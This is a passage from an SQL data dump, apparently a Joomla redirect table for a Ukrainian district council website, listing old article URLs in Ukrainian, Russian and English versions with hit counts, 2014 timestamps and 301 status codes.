00:00:00',301),(228,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1220:2014-02-21-15-56-19&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-16 11:51:23','0000-00-00 00:00:00',301),(229,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1220:2014-02-21-15-56-19&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-16 11:51:34','0000-00-00 00:00:00',301),(230,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1220:2014-02-21-15-56-19&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',10,0,'2014-09-16 11:51:43','0000-00-00 00:00:00',301),(231,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1220:2014-02-21-15-56-19&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-16 11:51:54','0000-00-00 00:00:00',301),(232,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1221:2014-02-22-08-09-27&catid=15&lang=en&Itemid=0','','','',2,0,'2014-09-16 11:52:09','0000-00-00 00:00:00',301),(233,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1221:2014-02-22-08-09-27&catid=15&lang=ru&Itemid=0','','','',2,0,'2014-09-16 11:52:17','0000-00-00 00:00:00',301),(234,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1221:2014-02-22-08-09-27&catid=15&lang=uk&Itemid=0','','','',2,0,'2014-09-16 11:52:26','0000-00-00 00:00:00',301),(235,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1222:2014-02-22-10-52-44&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-16 11:52:36','0000-00-00 00:00:00',301),(236,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1222:2014-02-22-10-52-44&catid=11&lang=ru&Itemid=0','','','',6,0,'2014-09-16 11:52:45','0000-00-00 00:00:00',301),(237,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1222:2014-02-22-10-52-44&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-09-16 11:52:56','0000-00-00 00:00:00',301),(238,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1222:2014-02-22-10-52-44&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',10,0,'2014-09-16 11:53:07','0000-00-00 00:00:00',301),(239,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1222:2014-02-22-10-52-44&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-09-16 11:53:19','0000-00-00 00:00:00',301),(240,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1223:--28-----6-&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-16 11:53:29','0000-00-00 00:00:00',301),(241,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1223:--28-----6-&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-16 11:53:39','0000-00-00 00:00:00',301),(242,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1223:--28-----6-&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-09-16 11:53:48','0000-00-00 00:00:00',301),(243,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1223:--28-----6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-16 11:53:55','0000-00-00 00:00:00',301),(244,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1223:--28-----6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',7,0,'2014-09-16 11:54:03','0000-00-00 00:00:00',301),(245,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1224:----25--2014-&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-16 11:54:14','0000-00-00 00:00:00',301),(246,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1224:----25--2014-&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-16 11:54:25','0000-00-00 00:00:00',301),(247,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1224:----25--2014-&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-09-16 11:54:33','0000-00-00 00:00:00',301),(248,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1224:----25--2014-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-16 11:54:42','0000-00-00 00:00:00',301),(249,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1224:----25--2014-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-16 11:54:51','0000-00-00 00:00:00',301),(250,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1225:2014-02-24-13-27-21&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-16 11:54:58','0000-00-00 00:00:00',301),(251,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1225:2014-02-24-13-27-21&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-16 11:55:11','0000-00-00 00:00:00',301),(252,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1225:2014-02-24-13-27-21&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-09-16 11:55:21','0000-00-00 00:00:00',301),(253,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1225:2014-02-24-13-27-21&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-09-16 11:55:30','0000-00-00 00:00:00',301),(254,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1225:2014-02-24-13-27-21&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',8,0,'2014-09-16 11:55:39','0000-00-00 00:00:00',301),(255,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1226:-1996-2004-&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-16 11:55:49','0000-00-00 00:00:00',301),(256,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1226:-1996-2004-&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-16 11:56:00','0000-00-00 00:00:00',301),(257,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1226:-1996-2004-&catid=11&lang=uk&Itemid=0','','','',4,0,'2014-09-16 11:56:07','0000-00-00 00:00:00',301),(258,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1226:-1996-2004-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-09-16 11:56:16','0000-00-00 00:00:00',301),(259,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1226:-1996-2004-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-09-16 11:56:24','0000-00-00 00:00:00',301),(260,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1227:2014-02-25-07-36-58&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-16 11:56:36','0000-00-00 00:00:00',301),(261,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1227:2014-02-25-07-36-58&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-16 11:56:46','0000-00-00 00:00:00',301),(262,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1227:2014-02-25-07-36-58&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-16 11:56:57','0000-00-00 00:00:00',301),(263,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1227:2014-02-25-07-36-58&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',10,0,'2014-09-16 11:57:07','0000-00-00 00:00:00',301),(264,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1227:2014-02-25-07-36-58&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-16 11:57:14','0000-00-00 00:00:00',301),(265,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1228:2014-02-27-14-42-41&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-16 11:57:24','0000-00-00 00:00:00',301),(266,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1228:2014-02-27-14-42-41&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-16 11:57:49','0000-00-00 00:00:00',301),(267,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1228:2014-02-27-14-42-41&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-09-16 11:58:00','0000-00-00 00:00:00',301),(268,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1228:2014-02-27-14-42-41&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-16 11:58:09','0000-00-00 00:00:00',301),(269,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1228:2014-02-27-14-42-41&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-16 11:58:21','0000-00-00 00:00:00',301),(270,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1230:l-r&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-16 11:58:31','0000-00-00 00:00:00',301),(271,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1230:l-r&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-16 11:58:43','0000-00-00 00:00:00',301),(272,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1230:l-r&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-09-16 11:58:51','0000-00-00 00:00:00',301),(273,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1230:l-r&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-16 11:58:59','0000-00-00 00:00:00',301),(274,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1230:l-r&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',7,0,'2014-09-16 11:59:08','0000-00-00 00:00:00',301),(275,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1231:-q-q&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-16 11:59:18','0000-00-00 00:00:00',301),(276,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1231:-q-q&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-16 11:59:26','0000-00-00 00:00:00',301),(277,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1231:-q-q&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-09-16 11:59:36','0000-00-00 00:00:00',301),(278,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1231:-q-q&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-09-16 11:59:45','0000-00-00 00:00:00',301),(279,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1231:-q-q&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',8,0,'2014-09-16 11:59:53','0000-00-00 00:00:00',301),(280,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1031:2013-06-17-06-49-26&catid=51:--19072013-&Itemid=92&lang=uk','','','',10,0,'2014-09-16 11:59:59','0000-00-00 00:00:00',301),(281,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1232:2014-03-02-14-32-43&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-16 12:00:09','0000-00-00 00:00:00',301),(282,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1232:2014-03-02-14-32-43&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-16 12:00:19','0000-00-00 00:00:00',301),(283,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1232:2014-03-02-14-32-43&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-16 12:00:30','0000-00-00 00:00:00',301),(284,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1232:2014-03-02-14-32-43&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',10,0,'2014-09-16 12:00:41','0000-00-00 00:00:00',301),(285,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1216:-q-q&catid=11&Itemid=14&lang=ru','','','',13,0,'2014-09-16 12:00:47','0000-00-00 00:00:00',301),(286,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1232:2014-03-02-14-32-43&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-16 12:00:47','0000-00-00 00:00:00',301),(287,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1233:2014-03-03-10-28-35&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-16 12:00:56','0000-00-00 00:00:00',301),(288,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1233:2014-03-03-10-28-35&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-16 12:01:06','0000-00-00 00:00:00',301),(289,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1233:2014-03-03-10-28-35&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-16 12:01:16','0000-00-00 00:00:00',301),(290,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1233:2014-03-03-10-28-35&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',15,0,'2014-09-16 12:01:26','0000-00-00 00:00:00',301),(291,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1033:2013-06-18-12-58-36&catid=36&Itemid=70&lang=ru','','','',7,0,'2014-09-16 12:01:32','0000-00-00 00:00:00',301),(292,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1233:2014-03-03-10-28-35&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',10,0,'2014-09-16 12:01:35','0000-00-00 00:00:00',301),(293,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1234:2014-03-04-09-59-46&catid=11&lang=en&Itemid=0','','','',7,0,'2014-09-16 12:01:44','0000-00-00 00:00:00',301),(294,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1234:2014-03-04-09-59-46&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-16 12:01:51','0000-00-00 00:00:00',301),(295,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1234:2014-03-04-09-59-46&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-09-16 12:01:59','0000-00-00 00:00:00',301),(296,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1234:2014-03-04-09-59-46&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-09-16 12:02:07','0000-00-00 00:00:00',301),(297,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1234:2014-03-04-09-59-46&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-09-16 12:02:17','0000-00-00 00:00:00',301),(298,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1235:2014-03-06-13-25-26&catid=11&lang=en&Itemid=0','','','',6,0,'2014-09-16 12:02:26','0000-00-00 00:00:00',301),(299,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1027:-2013-2013-&catid=51&Itemid=92&lang=uk','','','',11,0,'2014-09-16 12:02:31','0000-00-00 00:00:00',301),(300,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1039:---------------l-r&catid=36&Itemid=70&lang=ru','','','',10,0,'2014-09-16 12:02:34','0000-00-00 00:00:00',301),(301,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1235:2014-03-06-13-25-26&catid=11&lang=ru&Itemid=0','','','',7,0,'2014-09-16 12:02:36','0000-00-00 00:00:00',301),(302,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1235:2014-03-06-13-25-26&catid=11&lang=uk&Itemid=0','','','',5,0,'2014-09-16 12:02:46','0000-00-00 00:00:00',301),(303,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1081:-2013-2017-&catid=36&Itemid=70&lang=uk','','','',14,0,'2014-09-16 12:02:47','0000-00-00 00:00:00',301),(304,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1235:2014-03-06-13-25-26&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-16 12:02:56','0000-00-00 00:00:00',301),(305,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1235:2014-03-06-13-25-26&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-09-16 12:03:03','0000-00-00 00:00:00',301),(306,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1236:2014-03-07-06-36-44&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-16 12:03:13','0000-00-00 00:00:00',301),(307,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1236:2014-03-07-06-36-44&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-16 12:03:20','0000-00-00 00:00:00',301),(308,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1236:2014-03-07-06-36-44&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-16 12:03:27','0000-00-00 00:00:00',301),(309,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1236:2014-03-07-06-36-44&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',19,0,'2014-09-16 12:03:34','0000-00-00 00:00:00',301),(310,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=895:-2013-2017-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',6,0,'2014-09-16 12:03:38','0000-00-00 00:00:00',301),(311,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1222:2014-02-22-10-52-44&catid=11&Itemid=14&lang=en','','','',21,0,'2014-09-16 12:03:41','0000-00-00 00:00:00',301),(312,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1236:2014-03-07-06-36-44&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-16 12:03:42','0000-00-00 00:00:00',301),(313,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1237:-200-&catid=11&lang=en&Itemid=0','','','',6,0,'2014-09-16 12:03:52','0000-00-00 00:00:00',301),(314,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1237:-200-&catid=11&lang=ru&Itemid=0','','','',4,0,'2014-09-16 12:04:00','0000-00-00 00:00:00',301),(315,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1237:-200-&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-09-16 12:04:09','0000-00-00 00:00:00',301),(316,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1237:-200-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-16 12:04:16','0000-00-00 00:00:00',301),(317,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1237:-200-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-16 12:04:24','0000-00-00 00:00:00',301),(318,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1238:2014-03-09-06-41-00&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-16 12:04:32','0000-00-00 00:00:00',301),(319,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1089:-l-r-&catid=53&Itemid=94&lang=en','','','',11,0,'2014-09-16 12:04:37','0000-00-00 00:00:00',301),(320,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1238:2014-03-09-06-41-00&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-16 12:04:44','0000-00-00 00:00:00',301),(321,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1179:2014-01-21-12-44-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',10,0,'2014-09-16 12:04:55','0000-00-00 00:00:00',301),(322,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1238:2014-03-09-06-41-00&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-16 12:04:56','0000-00-00 00:00:00',301),(323,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1238:2014-03-09-06-41-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-09-16 12:05:04','0000-00-00 00:00:00',301),(324,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1238:2014-03-09-06-41-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',7,0,'2014-09-16 12:05:12','0000-00-00 00:00:00',301),(325,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1239:--29----6-&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-16 12:05:20','0000-00-00 00:00:00',301),(326,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1239:--29----6-&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-16 12:05:28','0000-00-00 00:00:00',301),(327,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1239:--29----6-&catid=11&lang=uk&Itemid=0','','','',4,0,'2014-09-16 12:05:36','0000-00-00 00:00:00',301),(328,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1239:--29----6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-09-16 12:05:43','0000-00-00 00:00:00',301),(329,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1239:--29----6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',11,0,'2014-09-16 12:05:50','0000-00-00 00:00:00',301),(330,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1245:2014-03-17-17-23-36&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-16 12:05:57','0000-00-00 00:00:00',301),(331,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1245:2014-03-17-17-23-36&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-16 12:06:04','0000-00-00 00:00:00',301),(332,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1245:2014-03-17-17-23-36&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-16 12:06:13','0000-00-00 00:00:00',301),(333,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1245:2014-03-17-17-23-36&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-09-16 12:06:21','0000-00-00 00:00:00',301),(334,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1245:2014-03-17-17-23-36&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-16 12:06:30','0000-00-00 00:00:00',301),(335,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1247:2014-03-20-14-37-15&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-16 12:06:40','0000-00-00 00:00:00',301),(336,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1247:2014-03-20-14-37-15&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-16 12:06:47','0000-00-00 00:00:00',301),(337,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1247:2014-03-20-14-37-15&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-09-16 12:06:55','0000-00-00 00:00:00',301),(338,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1247:2014-03-20-14-37-15&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-16 12:07:01','0000-00-00 00:00:00',301),(339,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1248:2014-03-21-18-16-44&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-16 12:07:09','0000-00-00 00:00:00',301),(340,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1248:2014-03-21-18-16-44&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-16 12:07:19','0000-00-00 00:00:00',301),(341,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1248:2014-03-21-18-16-44&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-16 12:07:25','0000-00-00 00:00:00',301),(342,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1248:2014-03-21-18-16-44&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-09-16 12:07:32','0000-00-00 00:00:00',301),(343,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1345:2014-06-17-07-48-07&catid=59&Itemid=107&lang=ru','','','',7,0,'2014-09-16 12:07:38','0000-00-00 00:00:00',301),(344,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1248:2014-03-21-18-16-44&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',7,0,'2014-09-16 12:07:42','0000-00-00 00:00:00',301),(345,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1250:2014-03-24-07-04-57&catid=11&lang=en&Itemid=0','','','',6,0,'2014-09-16 12:07:49','0000-00-00 00:00:00',301),(346,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1250:2014-03-24-07-04-57&catid=11&lang=ru&Itemid=0','','','',7,0,'2014-09-16 12:07:56','0000-00-00 00:00:00',301),(347,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1250:2014-03-24-07-04-57&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-16 12:08:02','0000-00-00 00:00:00',301),(348,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1250:2014-03-24-07-04-57&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',10,0,'2014-09-16 12:08:08','0000-00-00 00:00:00',301),(349,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1134:-25-6-&catid=11&Itemid=14&lang=en','','','',14,0,'2014-09-16 12:08:13','0000-00-00 00:00:00',301),(350,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1250:2014-03-24-07-04-57&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',8,0,'2014-09-16 12:08:14','0000-00-00 00:00:00',301),(351,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1252:2014-03-24-17-19-07&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-16 12:08:20','0000-00-00 00:00:00',301),(352,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1252:2014-03-24-17-19-07&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-16 12:08:27','0000-00-00 00:00:00',301),(353,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1252:2014-03-24-17-19-07&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',7,0,'2014-09-16 12:08:35','0000-00-00 00:00:00',301),(354,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1254:-1-50&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-16 12:08:43','0000-00-00 00:00:00',301),(355,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1254:-1-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',10,0,'2014-09-16 12:08:51','0000-00-00 00:00:00',301),(356,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1256:2014-03-27-17-22-43&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-16 12:08:57','0000-00-00 00:00:00',301),(357,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1256:2014-03-27-17-22-43&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-16 12:09:05','0000-00-00 00:00:00',301),(358,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=888:-2012-&catid=46:--21122012&Itemid=85&lang=uk','','','',8,0,'2014-09-16 12:09:05','0000-00-00 00:00:00',301),(359,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1256:2014-03-27-17-22-43&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-09-16 12:09:13','0000-00-00 00:00:00',301),(360,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1256:2014-03-27-17-22-43&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',9,0,'2014-09-16 12:09:21','0000-00-00 00:00:00',301),(361,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1256:2014-03-27-17-22-43&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-16 12:09:27','0000-00-00 00:00:00',301),(362,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1257:2014-03-29-18-03-31&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-16 12:09:37','0000-00-00 00:00:00',301),(363,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1257:2014-03-29-18-03-31&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-09-16 12:09:45','0000-00-00 00:00:00',301),(364,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1257:2014-03-29-18-03-31&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-09-16 12:09:51','0000-00-00 00:00:00',301),(365,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1238:2014-03-09-06-41-00&catid=11&Itemid=14&lang=en','','','',5,0,'2014-09-16 12:09:53','0000-00-00 